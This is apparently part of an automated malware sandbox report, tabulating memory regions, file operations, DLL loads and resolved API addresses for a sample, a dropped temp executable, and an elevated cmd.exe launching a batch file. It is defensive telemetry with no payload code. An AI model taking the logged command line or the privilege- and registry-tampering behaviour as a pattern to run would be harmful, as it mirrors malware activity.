| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:11:52 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #108: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #108 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:19, Reason: Child Process |
| Unmonitor | End Time: 00:03:36, Reason: Self Terminated |
| Monitor Duration | 00:01:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa84 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
EE0
0x
C60
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000002f0000 | 0x002f0000 | 0x0030ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00303fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00311fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00313fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00333fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00383fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00390fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04540000 | 0x045fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004600000 | 0x04600000 | 0x0460ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004650000 | 0x04650000 | 0x0465ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004660000 | 0x04660000 | 0x0483ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004840000 | 0x04840000 | 0x0493ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004940000 | 0x04940000 | 0x04abffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04ac0000 | 0x04df6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed80000 | 0x7ed80000 | 0x7ee7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee80000 | 0x7ee80000 | 0x7eea2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eea8000 | 0x7eea8000 | 0x7eeaafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeab000 | 0x7eeab000 | 0x7eeadfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeae000 | 0x7eeae000 | 0x7eeaefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeaf000 | 0x7eeaf000 | 0x7eeaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
